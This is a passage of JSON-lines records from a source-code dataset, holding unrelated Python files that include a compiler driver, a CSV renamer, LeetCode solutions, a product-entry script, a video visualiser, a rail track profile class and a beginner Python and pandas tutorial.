#\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER #\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING #\n# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER #\n# DEALINGS IN THE SOFTWARE. #\n# #\n#=============================================================================#\n\n\nimport driver.ast_source as ast_source\nimport driver.ast_lexer as ast_lexer\nimport driver.ast_parser as ast_parser\nimport driver.compiler as compiler\nimport driver.tools as tools\nimport sys\n\n\n_prompt = '[kmo-driver]'\n_driver_map = {\n '--ast-source' : ast_source.main,\n '--ast-lexer' : ast_lexer.main,\n '--ast-parser' : ast_parser.main,\n '--compiler' : compiler.main\n}\n\n\ndef _run_driver(args):\n if len(args) <= 1:\n tools.display('Select a driver to run: ', _prompt)\n for driver in _driver_map.keys():\n msg = ' ' + driver\n tools.display(msg)\n tools.exit(0)\n driver = args[1]\n if driver not in _driver_map:\n raise tools.DriverError('Unrecognized driver: ' + driver)\n tools.display('Running driver: ' + driver, _prompt)\n tools.display('---', _prompt)\n entrypoint = _driver_map[driver]\n argv = args[1:]\n code = entrypoint(argv)\n tools.display('---', _prompt)\n tools.display('Exit code: ' + str(code), _prompt)\n tools.exit(code)\n return\n\n\ndef main(args):\n try:\n _run_driver(args)\n except tools.DriverError as err:\n tools.display('ERROR: ' + str(err), _prompt)\n tools.exit(1)\n assert(false)\n return 0\n\n\nif __name__ == '__main__':\n main(sys.argv)\n\n","sub_path":"driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":3119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"153192760","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nThis script renames columns in CSV file.\n\"\"\"\n\nimport sys\n\nimport pandas\n\n\ndef main():\n \"\"\"\n Main entry point into the script.\n \"\"\"\n if len(sys.argv) < 5 and len(sys.argv) % 2 == 0:\n print('USAGE: csv_rename.py CSV_FILE_IN CSV_FILE_OUT COLUMN_1_FROM COLUMN_2_FROM ... COLUMN_1_TO COLUMN_2_TO ...') # noqa: E501 pylint: disable=C0301\n else:\n csv = pandas.read_csv(sys.argv[1])\n flat = sys.argv[3:]\n half = len(flat) // 2\n before = flat[:half]\n after = flat[half:]\n translation = dict(zip(before, after))\n csv.rename(columns=translation, inplace=True)\n csv.to_csv(sys.argv[2], index=False)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"csv-rename/csv_rename.py","file_name":"csv_rename.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"558864715","text":"# Given a binary search tree with non-negative values, find the minimum absolute difference between values of any two nodes.\n\n# Example:\n\n# Input:\n\n# 1\n# \\\n# 3\n# /\n# 2\n\n# Output:\n# 1\n\n# Explanation:\n# The minimum absolute difference is 1, which is the difference between 2 and 1 (or between 2 and 3).\n# Note: There are at least two nodes in this BST.\n\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\n# don't know why this is wrong\nclass Solution(object):\n l = []\n def inOrder(self, root):\n if not root: return\n self.inOrder(root.left)\n self.l.append(root.val)\n self.inOrder(root.right)\n\n def getMinimumDifference(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: int\n \"\"\"\n self.inOrder(root)\n\n m = sys.maxint\n\n for a, b in zip(self.l, self.l[1:]):\n if abs(a - b) < m:\n m = abs(a - b)\n\n return m\n\nclass Solution(object):\n def getMinimumDifference(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: int\n \"\"\"\n l = []\n def inOrder(root):\n if not root: return\n inOrder(root.left)\n l.append(root.val)\n inOrder(root.right)\n \n inOrder(root)\n\n m = sys.maxint\n\n for a, b in zip(l, l[1:]):\n if abs(a - b) < m:\n m = abs(a - b)\n\n return m","sub_path":"LC/Easy/530.py","file_name":"530.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"188680258","text":"# -*- coding: utf-8 -*-\n\n# Insere novo Produto\n\nimport csv\nimport os\n\ndados_produto = dict()\n\ndef new_Produto():\n\tprint('\\n')\n\twhile True:\n\n\t\tprint('\\t\\tNOVO PRODUTO')\n\n\t\tnome_produto = input('- NOME: ')\n\t\tdados_produto['NOME'] = nome_produto\n\n\t\tdescricao = input('- DESCRIÇÃO: ')\n\t\tdados_produto['DESCRIÇÃO'] = descricao\n\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\tquantidade = int(input('- QUANTIDADE: '))\n\t\t\t\tdados_produto['QUANTIDADE'] = quantidade\n\t\t\t\tbreak\n\t\t\texcept ValueError:\n\t\t\t\tprint('Digite apenas numeros real')\n\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\tvalor = float(input('- VALOR UNITÁRIO: '))\n\t\t\t\tdados_produto['VALOR'] = valor\n\t\t\t\tbreak\n\n\t\t\texcept ValueError:\n\t\t\t\tprint(\"Somente numeros com formato 2.99 são aceitos.\\nUse ponto, não virgula\\nTente novamente.\")\n\n\n\t\tgravando_dados = open(\"Produtos.csv\", \"at\")\n\t\ttry:\n\t\t\twrite = csv.writer(gravando_dados)\n\t\t\tif os.stat(\"Produtos.csv\").st_size == 0:\n\t\t\t\twrite.writerow(dados_produto.keys())\n\t\t\twrite = csv.writer(gravando_dados)\n\t\t\twrite.writerow(dados_produto.values())\n\n\t\tfinally:\n\t\t\tgravando_dados.close()\n\n\t\tprint('INFO: REGISTRO ARMAZENADO COM SUCESSO\\n\\n')\n\n\t\tadd_produto = input('Deseja cadastra novo produto(Y/n): ')\n\t\tif add_produto == 'Y' or add_produto == 'y':\n\t\t\tcontinue\n\t\telse:\n\t\t\tbreak\n","sub_path":"ProgramacaoI/Fruteira/Inserir_Produto.py","file_name":"Inserir_Produto.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"378171729","text":"import sys\nfrom itertools import combinations\nfrom copy import deepcopy\nfrom collections import deque\ninput = sys.stdin.readline\n\nn, m = map(int, input().split()) # 연구소의 크기, 바이러스의 개수\nboard = [list(map(int, input().split())) for _ in range(n)]\nvirus = []\nfor i in range(n):\n for j in range(n):\n if(board[i][j] == 2): # 바이러스 위치 찾기\n virus.append([i, j])\n\ncomb = list(combinations(virus, m)) # 바이러스 m개 조합\n\ndx, dy = [0, 1, 0, -1], [1, 0, -1, 0]\n\ndef check(board): # 빈칸이 없는지 and 최솟값\n cnt = 0\n flag = 0\n for i in range(n):\n for j in range(n):\n if(board[i][j] == 0):\n return False\n if(board[i][j] < cnt):\n flag = 1 # 1초라도 흘렀음\n cnt = board[i][j]\n if(flag == 0): # 1초도 안흐름\n return \"0\"\n else:\n return cnt\n\ndef dfs(active):\n tempboard = deepcopy(board)\n q = deque(active)\n cnt = 1 # 경과 시간\n visited = [[0]*n for _ in range(n)]\n temp = []\n while(q):\n while(q):\n x, y = q.popleft()\n visited[x][y] = 1\n for j in range(4):\n nx = x + dx[j]\n ny = y + dy[j]\n if(0<=nx 0:\n frame = draw_masks_from_json(frame, cnn_dict['detection_masks'], track_dict[str(frame_idx)])\n cv2.rectangle(frame, (int(frame_width * roi[1]), int(frame_height * roi[0])),\n (int(frame_width * roi[3]), int(frame_height * roi[2])), (255, 0, 0), 3)\n cv2.putText(frame, f\"visitors = {visitors}, attendants = {incoming}\", (0, 45), font, 2, (0, 0, 255), 2, cv2.LINE_AA)\n frames_queue.put(frame)\n cnn_dict = cnn_queue.get()\n (grabbed, frame) = capturer.read()\n if frame_idx % 30 == 0:\n print(\"frame = \", frame_idx, \" of \", total_frames, \" queue = \", cnn_queue.qsize())\n print(\"time for processing 1 frame = \", time.time() - timer)\n frame_idx += 1\n frames_queue.put('finished')\n\n\ndef load_json_track(filename):\n json_track_path = os.path.join(os.getcwd(), 'jsons', filename + '_tracks.json')\n with open(json_track_path) as fp:\n track_content = fp.readlines()\n track_dict = json.loads(track_content[0])\n return track_dict\n\n\ndef write_video(filename, frames_queue, fps=30):\n out_videopath = os.path.join(os.getcwd(), 'videos_output', filename)\n frame = frames_queue.get(30)\n frame_height, frame_width = frame.shape[:2]\n fourcc = cv2.VideoWriter_fourcc(*'DIVX')\n video = cv2.VideoWriter(out_videopath, fourcc, fps, (frame_width, frame_height))\n while frame != 'finished':\n video.write(frame)\n frame = frames_queue.get(30)\n video.release()\n\n\ndef get_frame_with_boxes(frame, boxes):\n frame_height, frame_width = frame.shape[0], frame.shape[1]\n for box in boxes:\n cv2.rectangle(frame, (int(frame_width * box[1]), int(frame_height * box[0])),\n (int(frame_width * box[3]), int(frame_height * box[2])), (0, 255, 0), 3)\n return frame\n\n\ndef draw_masks_from_json(frame, masks, track_records):\n masks_filter = np.zeros(frame.shape).astype(np.float64)\n masks = np.array(masks)\n for record in track_records:\n masks_filter = masks_filter + np.equal(masks, record[1] + 1)[:, :, np.newaxis] * get_random_color(record[2])\n frame = np.minimum(frame + (masks_filter * 100), 255).astype(np.uint8)\n return frame\n\n\ndef get_random_color(idx):\n r.seed(idx + 15574)\n rgb = np.array([r.random(), r.random(), r.random()]).T\n return rgb\n\n\ndef get_frame_with_masks(frame, masks):\n masks_filter = np.zeros(frame.shape).astype(np.float64)\n masks_indexes = masks.shape[2]\n for i in range(masks_indexes):\n mask = masks[:, :, i, np.newaxis]\n rgb = np.array([r.random(), r.random(), r.random()]).T\n masks_filter = masks_filter + mask * rgb\n frame = np.minimum(frame + (masks_filter * 100), 255).astype(np.uint8)\n return frame\n\n\nif __name__ == '__main__':\n visualize('Venice-2.mp4')\n # '''\n","sub_path":"computer_vision_project/serializer.py","file_name":"serializer.py","file_ext":"py","file_size_in_byte":8058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"505791788","text":"# Given a string containing just the characters '(' and ')', find the length of the longest valid (well-formed) parentheses substring.\n\n# Example 1:\n\n# Input: \"(()\"\n# Output: 2\n# Explanation: The longest valid parentheses substring is \"()\"\n# Example 2:\n\n# Input: \")()())\"\n# Output: 4\n# Explanation: The longest valid parentheses substring is \"()()\"\n\nclass Solution:\n def longestValidParentheses(self, s):\n\n\n\n # count = 0\n if not s:\n return 0\n len_s = len(s)\n i = 0\n while i < len_s and s[i] == ')':\n # if :\n i += 1\n end = len_s\n while end > i and not self.IsPar(s[i:end]):\n end -= 1\n count = end - i\n if end == 0:\n end = 1\n # print(count,s[end:])\n return max(count,self.longestValidParentheses(s[end:]))\n\n\n def IsPar(self,s):\n if s[0] == ')':\n return False\n list_items = []\n for i in range(len(s)):\n if s[i] == ')' and len(list_items) > 0:\n if list_items[-1] == '(':\n list_items.pop()\n else:\n list_items.append(s[i])\n return not list_items\n\n\n def longestValidParentheses_dp(self, s):\n dp, stack = [0]*(len(s) + 1), []\n for i in range(len(s)):\n if s[i] == '(':\n stack.append(i)\n else:\n if stack:\n p = stack.pop()\n \n dp[i + 1] = dp[p] + i - p + 1\n print(p,i, dp[p] + i - p + 1,dp)\n return max(dp)\n \n def mylongestvp(self,s):\n dp = [0]*(len(s)+1)\n max_len = 0\n stack = []\n for i in range(len(s)):\n if s[i] == '(':\n stack.append(s[i])\n if len(stack) > 0 and s[i] == ')':\n stack.pop()\n dp[i+1] = dp[i] + 2\n dp[i+1] = dp[i+1] + dp[i+1-dp[i+1]]\n if dp[i+1] > max_len:\n max_len = dp[i+1]\n return max_len\nif __name__ == \"__main__\":\n s = \"()\"\n print(Solution().longestValidParentheses_dp(s))\n print(Solution().mylongestvp(s))\n","sub_path":"001-050/032.longestvalidparetheses.py","file_name":"032.longestvalidparetheses.py","file_ext":"py","file_size_in_byte":2183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"57137654","text":"#from linespace import Linespace\nimport csv\nimport profiles\nclass Track:\n # Takes inputs in metric measures, specifically takes location is kilometers,\n # speed in km/h, dwell time in seconds, and gradient in m/km\n def __init__(self):\n #self.length = max(track_km)\n self.velocity_mps = velocity_profile(step_size)[1] # velocity limit in m/s\n self.velocity_m = velocity_profile(step_size)[0] # velocity zones in meters\n self.velocity_mph = self.velocity_mps*2.23694 # velocity limit in mps\n self.velocity_mi = self.velocity_m*0.000621371 # velocity zones in miles\n self.velocity_kph = self.velocity_mps*3.6 # velocity limit in km/h\n self.velocity_km = self.velocity_m*1000 # velocity zones in km\n self.stopLocKm = [] # stop location in km\n self.dwellTimeS = [] # stop dwell time in seconds\n self.stopLocMiles = [] # stop location in Miles\n self.dwellTimeMinutes = [] # stop dwell time in minutes\n self.stopLocMeters = [] # stop location in meters\n self.dwellTimeHours = [] # stop dwell time in hours\n self.velocityKmph = [] # velocity limit in km/h\n self.velocityZoneKm = [] # velocity zones in km\n self.velocityMph = [] # velocity limit in mph\n self.velocityZoneMiles = [] # velocity zones in miles\n \n self.gradeLocKm = [] # gradient zones in km\n self.gradePercent = [] # gradient (percent rise/run)\n self.gradeLocMeters = [] # gradient zones in Meters\n self.gradeLocMiles = [] # gradient zones in miles\n \n\n\n def create(self,speed_prof,station_loc,gradient_prof):\n # Step 1: Read velocity zone restrictions from csv into list\n gradient_prof = pd.read_csv(gradient_prof)\n velocity_profile = pd.read_csv(speed_prof).append(pd.read_csv(station_loc)).fillna(0)\n\n\n #trackMiles = []\n #trackMPH = []\n #with open(speed_prof, 'r') as csvfile:\n # spamreader = csv.reader(csvfile)\n # for row in spamreader:\n # if len(row) > 1:\n # trackMiles = trackMiles + [float(row[0])] # miles\n # trackMPH = trackMPH + [float(row[1])] # miles\n #trackKM = [entry * 1.6 for entry in trackMiles] # miles to km\n #trackKMPH = [entry*1.609 for entry in trackMPH] # mph to km/h \n ## Add Velocity Limit:\n #for i in range(0,len(trackKMPH)):\n # self.velocity_kph.append(trackKMPH[i]) \n # self.velocity_km.append(trackKM[i])\n # self.velocity_mps.append(trackKMPH[i]*0.277778) \n # self.velocityZoneMeters.append(trackKM[i]/1000)\n # self.velocityMph.append(trackKMPH[i]*0.621371689334) \n # self.velocityZoneMiles.append(trackKM[i]*0.621371689334)\n ## Step 2: Read station location from csv into list\n #stationLocation = []\n #stationDwell = []\n #with open(station_loc, 'r') as csvfile:\n # spamreader = csv.reader(csvfile)\n # for row in spamreader:\n # if len(row) > 1:\n # stationLocation = stationLocation + [float(row[0])] # miles\n # stationDwell = stationDwell + [float(row[1])] # seconds\n # If dwell time is zero seconds, delete that row\n #for i in range(0,len(stationDwell)):\n # if len(stationDwell) >= i: # rechecks length of stationDwell since we delete some of its rows\n # if stationDwell[i] == 0:\n # del stationDwell[i]\n # del stationLocation[i]\n #stationLocationKM = [entry*1.6 for entry in stationLocation] # mph to km/h\n ## Add Stops:\n #for i in range(0,len(stationLocationKM)):\n # self.stopLocKm.append(stationLocationKM[i]) \n # self.dwellTimeS.append(stationDwell[i])\n ## Step 3: Read gradient data from csv into list\n #gradientLocation = []\n #gradient = []\n #with open(gradient_prof, 'r') as csvfile:\n # spamreader = csv.reader(csvfile)\n # for row in spamreader:\n # if len(row) > 1:\n # gradientLocation = gradientLocation + [float(row[0])] # miles\n # gradient = gradient + [float(row[1])] # miles\n #gradientLocationKM = [entry*1.6 for entry in gradientLocation] # mph to km/h\n ## Add Gradient Profile:\n #for i in range(0,len(gradientLocationKM)):\n # self.gradeLocKm.append(gradientLocationKM[i])\n # self.gradePercent.append(gradient[i]) \n #def add_stop(self, stop_location, dwell_time):\n #def add_vel_limit(self, kmph, km):\n #def add_grade(self, gradeLoc, grade):\n\n #def reverse():\n # #trackKM = list(reversed([entry * 1.6 for entry in trackMiles])) # miles to km\n # trackKMPH = list(reversed([entry*1.609 for entry in trackMPH])) # mph to km/h\n # trackKMPH[0] = trackKMPH[1]\n # trackKMPH[-1] = 0\n # gradient = list(reversed(gradient))\n # gradientLocationKM = list(reversed(gradientLocationKM))\n # #stationDwell = list(reversed(stationDwell))\n # #print 'Reversed gradientLocationKM is' ,gradientLocationKM\n \n # ##################\n # trackKM = [max(trackKM)-entry for entry in trackKM]\n # #print 'Reversed stationLocationKM:' , stationLocationKM\n # trackKM = list(reversed(trackKM))\n # print 'Reversed Speed Zones:', trackKM\n # print 'Reversed Speed Limits:', trackKMPH\n # #diff = []\n # #for i in range(0,len(trackKM)-1):\n # # diff = diff + [trackKM[i]-trackKM[i+1]]\n # #trackKM[0] = 0\n # #for i in range(1,len(trackKM)):\n # # trackKM[i] = trackKM[i-1] + ( diff[i-1] ) \n # #print 'Reversed trackKM' ,trackKM\n # #############\n # diff = []\n # for i in range(0,len(gradientLocationKM)-1):\n # diff = diff + [gradientLocationKM[i]-gradientLocationKM[i+1]]\n # gradientLocationKM[0] = 0\n # for i in range(1,len(gradientLocationKM)):\n # gradientLocationKM[i] = gradientLocationKM[i-1] + ( diff[i-1] ) \n # #print(gradientLocationKM)\n # ##################\n # diff = []\n # for i in range(0,len(stationLocationKM)-1):\n # diff = diff + [stationLocationKM[i+1]-stationLocationKM[i]]\n # print 'diffs:' , diff\n # stationLocationKM = [max(stationLocationKM)-entry for entry in stationLocationKM]\n # #print 'Reversed stationLocationKM:' , stationLocationKM\n # stationLocationKM = list(reversed(stationLocationKM))\n # print 'before stationLocationKM', stationLocationKM\n # # If dwell time is zero seconds, ignore that row\n # for i in range(0,len(stationDwell)):\n # if len(stationDwell) >= i: # rechecks length of stationDwell since we delete some of its rows\n # if stationDwell[i] == 0:\n # del stationDwell[i]\n # del stationLocationKM[i]\n # print 'after stationLocationKM', stationLocationKM\n # print 'Reversed Dwells', stationDwell","sub_path":"track.py","file_name":"track.py","file_ext":"py","file_size_in_byte":7242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"457622726","text":"\n\nfrom xai.brain.wordbase.nouns._shanty import _SHANTY\n\n#calss header\nclass _SHANTIES(_SHANTY, ):\n\tdef __init__(self,): \n\t\t_SHANTY.__init__(self)\n\t\tself.name = \"SHANTIES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"shanty\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_shanties.py","file_name":"_shanties.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"639138579","text":"\n# coding: utf-8\n\n# # Índice\n# \n# \n# * [Operadores de atribuição](#Operadores-de-atribuição)\n# * [Trabalhando com datas e horas](#Trabalhando-com-datas-e-horas)\n# * [Lendo de bancos de dados](#Lendo-de-bancos-de-dados)\n# * [Funções](#Funções)\n# * [Condicionais](#Condicionais)\n# * [Loops](#Loops)\n# * [Conjuntos](#Conjuntos)\n# * [Listas](#Listas)\n# * [Tuplas](#Tuplas)\n# - [Usando listas para iteradores em loops](#Usando-listas-para-iteradores-em-loops)\n# * [Dicionários](#Dicionários)\n# * [Lendo dados](#Lendo-dados)\n# * [Lendo dados estruturados com pandas](#Lendo-dados-estruturados-com-pandas)\n# * [Lendo imagens com scikit-image](#Lendo-imagens-com-scikit-image)\n# * [Lendo arquivos XML](#Lendo-arquivos-XML)\n# * [Condicionando os dados](#Condicionando-os-dados)\n# * [Trabalhando com variáveis categóricas](#Trabalhando-com-variáveis-categóricas)\n# * [Trabalhando com datas](#Trabalhando-com-datas)\n# * [Tratando dados faltantes](#Tratando-dados-faltantes)\n# * [Fatiando](#Fatiando)\n# * [Concatenando e transformando](#Concatenando-e-transformando)\n# * [Agregação](#Agregação)\n\n# Operadores de atribuição\n# =========\n# [voltar](#Índice)\n\n# In[40]:\n\nmyvar = 2\nprint(\"myvar = %d\" %myvar)\nmyvar += 5\nprint(\"myvar += 5\\n%d\" %myvar)\nmyvar -= 2\nprint(\"myvar -= 2\\n%d\" %myvar)\nmyvar *= 2\nprint(\"myvar *= 2\\n%d\" %myvar)\nmyvar /= 4\nprint(\"myvar /= 4\\n%d\" %myvar)\nmyvar %= 2\nprint(\"myvar %%= 2\\n%.1f\" %myvar)\nmyvar **= 2\nprint(\"myvar **= 2\\n%.2f\" %myvar)\nmyvar *= 10\nprint(\"myvar *- 10\\n%.1f\" %myvar)\nmyvar //= 2\nprint(\"myvar //= 2\\n%d\" %myvar)\n\n\n# Trabalhando com datas e horas\n# =============\n# [Voltar](#Índice)\n\n# In[83]:\n\nfrom datetime import datetime as dt\nfrom datetime import timedelta\nprint('Microssegundo atual',dt.now().microsecond,'\\n\\n')\nhorainicio = dt.now()\nprint('Data e hora atual:', dt.now())\nprint('Hora atual:',dt.now().time())\nprint('Data atual:',dt.now().date())\nprint('Timezone:',dt.now().tzinfo)\n#Transformando string em datetime\nh1 = dt.strptime('11:23:22', '%H:%M:%S')\nh2 = dt.strptime('22:35:49', '%H:%M:%S')\nprint('A diferença entre',h1.time(),'e',h2.time(),'é',h1-h2)\nprint('Oops... A diferença na verdade é', h2-h1,'\\n\\n')\nhorafim = dt.now()\nprint('Microssegundo final',dt.now().microsecond)\ntdelta = horafim - horainicio\nprint(\"Tempo de processamento em microssegundos: %d\" %tdelta.microseconds)\n\n\n# Funções\n# =======\n# [Voltar](#Índice)\n\n# In[86]:\n\ndef displaymulti(argscount=0, *unknownvars):\n realargscount = len(unknownvars)\n if argscount == realargscount:\n print('Você forneceu',argscount,'argumentos:',unknownvars)\n else:\n print('Você disse que forneceu',argscount,'argumentos mas na verdade forneceu', realargscount, 'argumentos:',unknownvars)\n \ndisplaymulti()\ndisplaymulti(2,'Hello',True)\ndisplaymulti(4,'String', 1+4j,4.33)\n\n\n# Condicionais\n# ==========\n# [Voltar](#Índice)\n\n# In[106]:\n\ndef SecretNumber():\n One = int(input(\"Type a number between 1 and 10: \"))\n Two = int(input(\"Type a number between 1 and 10: \"))\n if (One >= 1) and (One <= 10):\n if (Two >= 1) and (Two <= 10):\n print('Your secret number is:', (One ** Two/One)/(Two-One)**3)\n else:\n print(\"Incorrect second value!\")\n else:\n print(\"Incorrect first value!\")\n \nSecretNumber()\n\n\n# Loops\n# ========\n# [Voltar](#Índice)\n\n# In[111]:\n\ndef displaymultifor(*VarArgs):\n for Arg in VarArgs:\n if Arg.upper() == 'CONT':\n continue\n print('Continue Argument: ' + Arg)\n elif Arg.upper() == 'BREAK':\n break\n print('Break Argument: ' + Arg)\n print('Good Argument: ' + Arg)\n\ndisplaymultifor(\"a\",\"233\",\"cont\",\"test\",\"break\",\"never happens\")\n\n\n# In[114]:\n\ndef secretnumberwhile():\n GotIt = False\n while GotIt == False:\n One = int(input(\"Type a number between 1 and 10: \"))\n Two = int(input(\"Type a number between 1 and 10: \"))\n if (One >= 1) and (One <= 10):\n if (Two >= 1) and (Two <= 10):\n print('Secret number is:',One * Two)\n GotIt = True\n continue #Makes sure that the 'Try again!' message is not printed\n else:\n print(\"Incorrect second value!\")\n else:\n print(\"Incorrect first value!\")\n print(\"Try again!\")\n\nsecretnumberwhile()\n\n\n# Conjuntos\n# ======\n# Também conhecidos como **sets**
    \n# [Voltar](#Índice)\n\n# In[134]:\n\nSetA = set(['Red', 'Blue', 'Green', 'Black'])\nSetB = set(['Black', 'Green', 'Yellow', 'Orange'])\nSetX = SetA.union(SetB)\nSetY = SetA.intersection(SetB)\nSetZ = SetA.difference(SetB)\nprint('X = A ∪ B:',SetX,'\\nY = A ∩ B:',SetY,'\\nZ = A\\\\B:',SetZ)\nprint('A é um superconjunto de Y (A ⊃ Y)?',SetA.issuperset(SetY))\nprint('A é um subconjunto de X (A ⊂ X)?', SetA.issubset(SetX))\nprint('\\nAdicionando elementos em A\\n')\nSetA.add('Purple')\nprint('A é um subconjunto de X (A ⊂ X)?', SetA.issubset(SetX))\nprint('A agora tem novos membros:',SetA)\n\n\n# Listas\n# =======\n# [Voltar](#Índice)\n\n# In[37]:\n\nListA = [0, 1, 2, 3]\nListB = [4, 5, 6, 7]\n#Acrescenta ListB no fim de ListA\nListA.extend(ListB)\nprint(ListA)\n#Acrescenta o -4 no fim da lista\nListA.append(-4)\nprint(ListA)\n#Adiciona o 0.2 na posição 2 (a terceira posição da lista)\nListA[2]=0.2\nprint(ListA)\n#Remove A PRIMEIRA OCORRENCIA do valor -4 da lista\nListA.remove(-4)\nprint(ListA)\n#Forma manual de fazer o insert\nListA = ListA[:2]+[2]+ListA[3:]\nprint(ListA)\n#Remove A PRIMEIRA OCORRENCIA do valor 2 da lista\nListA.remove(2)\nprint(ListA)\n#Insere o valor 200 na posição 2 da lista\nListA.insert(2,200)\nprint(ListA)\nListA.append([\"Lists can contain all types of data\",4+2.3j])\nprint(ListA)\n\n\n# Tuplas\n# ========\n# Tupas são como listas mas são imutáveis. Com isso as tuplas são mais seguras e mais rápidas que as listas\n# \n# [Voltar](#Índice)\n\n# In[36]:\n\ndef print_tuple_3levels(tpl):\n for Value1 in tpl:\n if type(Value1) == int:\n print(Value1)\n else:\n for Value2 in Value1:\n if type(Value2) == int:\n print(\"\\t\", Value2)\n else:\n for Value3 in Value2:\n print( \"\\t\\t\", Value3)\n\nMyTuple = (1, 2, 3, (4, 5, 6, (7, 8, 9)))\n\nMyNewTuple = MyTuple.__add__((10, 11, 12, (13, 14, 15)))\n\nprint_tuple_3levels(MyTuple)\nprint_tuple_3levels(MyNewTuple)\n\n\n# ## Usando listas para iteradores em loops\n# \n# [Voltar](#Índice)\n\n# In[43]:\n\nListA = ['Orange', 'Yellow', 'Green', 'Brown']\nListB = [1, 2, 3, 4]\n\n#Gets a sublist from ListB and prints its values\nfor Value in ListB[1:3]:\n print(Value)\n\n#Prints values iterating through two lists at the same time\nfor Value1, Value2 in zip(ListA, ListB):\n print(Value1, '\\t', Value2)\n\n\n# # Dicionários\n# [Voltar](#Índice)\n\n# In[58]:\n\nMyDict = {'Orange': 1, 'Blue': 2, 'Pink': 3}\nprint(MyDict['Blue'])\n\nfor val in MyDict:\n print(val)\n \nprint(MyDbict.keys())\nprint(MyDict.values())\n\n\n# # Lendo dados\n# * [Voltar](#Índice)\n# * [Lendo todo o conteúdo do arquivo para a memória](#Lendo-todo-o-conteúdo-do-arquivo-para-a-memória)\n# * [Fazendo \"streaming\". Lendo uma linha de cada vez](#Fazendo-\"streaming\".-Lendo-uma-linha-de-cada-vez)\n# * [Amostragem](#Amostragem)\n\n# ### Lendo todo o conteúdo do arquivo para a memória\n# \n# [Up](#Lendo-dados)\n\n# In[5]:\n\nwith open('Colors.txt') as colors_file:\n data = colors_file.read()\n print('Colors.txt content:\\n\\n', data)\n\n\n# ### Fazendo \"streaming\". Lendo uma linha de cada vez\n# \n# [Up](#Lendo-dados)\n\n# In[1]:\n\nwith open('Colors.txt') as colors_file:\n for file_line in colors_file:\n print('Reading Data:', file_line)\n\n\n# ### Amostragem\n# \n# [Up](#Lendo-dados)\n# \n# **Lendo uma a cada duas linhas**\n\n# In[31]:\n\nn = 2\n\nwith open('Colors.txt') as colors_file:\n#enumerate returns a tuple in the form (line_number, content)\n for j, content in enumerate(colors_file):\n if j % n == 0:\n print('Line',j,'-',content)\n\n\n# **Amostragem aleatória**\n\n# In[30]:\n\nfrom random import random\nsample_size = 0.5\nwith open(\"Colors.txt\") as open_file:\n for j, observation in enumerate(open_file):\n#random returns a value between 0 and 1. So, sample_size is in fact the probabilty of retreaving the data line\n if random()<=sample_size:\n print('Reading Line', j, ':', observation)\n\n\n# # Lendo dados estruturados com pandas\n# * [Voltar](#Índice)\n# * [Lendo arquivos texto](#Lendo-arquivos-texto)\n# * [Lendo arquivos csv](#Lendo-arquivos-csv)\n# * [Lendo arquivos posicionais (fixed width)](#Lendo-arquivos-posicionais-[fixed-width])\n# * [Lendo arquivos Excel](#Lendo-arquivos-Excel)\n\n# ### Lendo arquivos texto\n# \n# [Up](#Lendo-dados-estruturados-com-pandas)\n# \n# read_table, por padrão, usa \\t como separador mas é possível personalizar\n\n# In[32]:\n\nimport pandas as pd\ncolor_table = pd.io.parsers.read_table('Colors.txt')\nprint(color_table)\n\n\n# ### Lendo arquivos csv\n# \n# [Up](#Lendo-dados-estruturados-com-pandas)\n\n# In[40]:\n\ntitanic = pd.io.parsers.read_csv('Titanic.csv')\nprint(titanic[:5])\nprint(titanic[-5:])\n#reads age as a dataframe\nage = titanic[['age']]\nprint(age)\n#reads age as a list\nage = titanic[['age']].values\nprint(age)\n\n\n# ### Lendo arquivos posicionais [fixed width]\n# \n# [Up](#Lendo-dados-estruturados-com-pandas)\n\n# In[42]:\n\nfish_data = pd.read_fwf(\"x06.txt\", widths=[2,5,4,6], index_col=0,\n skiprows=37, header=None,\n names=[\"Age\", \"Temperature\", \"Length\"])\nfish_data[:10]\n\n\n# ### Lendo arquivos Excel\n# \n# [Up](#Lendo-dados-estruturados-com-pandas)\n# \n\n# In[82]:\n\n#Forma 1: Usando o parse\nxls = pd.ExcelFile('Values.xlsx')\ntrig_values = xls.parse('Sheet1', index_col=0, na_values=['NA'])\n\n#Forma 2: Usando o Read_Excel\ntrig_values = pd.read_excel('Values.xls', 'Sheet1', index_col=0, na_values=['NA'])\nprint(trig_values)\n\n\n# # Lendo imagens com *scikit-image*\n# [Voltar](#Índice)\n\n# In[87]:\n\n#Import libraries to read and show images\nfrom skimage.io import imread\nfrom skimage.transform import resize \nfrom matplotlib import pyplot as plt\nimport matplotlib.cm as cm\n\nexample_file = (\"http://upload.wikimedia.org/\" +\n \"wikipedia/commons/7/7d/Dog_face.png\")\n#Reads image into memory\nimage = imread(example_file, as_grey=True)\n#Renders the image\nplt.imshow(image, cmap=cm.gray)\n#Displays the 